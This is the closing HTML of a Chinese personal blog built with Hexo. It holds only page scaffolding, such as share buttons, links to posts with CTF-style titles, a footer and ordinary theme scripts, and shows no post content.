            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#web"><span class="toc-number">1.</span> <span class="toc-text">web</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录" title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"　| 清风的博客　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2019/09/28/bugku-web-web2/" title="上一篇: bugku_web_web2">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2019/06/13/ISCC-1/" title="下一篇: ISCC">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/09/28/bugku-web-GET/">bugku_web_GET</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/28/bugku-web-POST/">bugku_web_POST</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/28/bugku-web-计算机/">bugku_web_计算机</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/28/bugku-web-web2/">bugku_web_web2</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/08/web/">web</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/13/ISCC-1/">ISCC</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/05/hello-world/">Hello World</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2019 清风
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style="display:none">
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style="display:none">
                        <span id="page-visit" title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 1;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
             menu: ".header-menu a", 
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
    </div>
    <!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/clicklove.js"></script>
</body>
</html>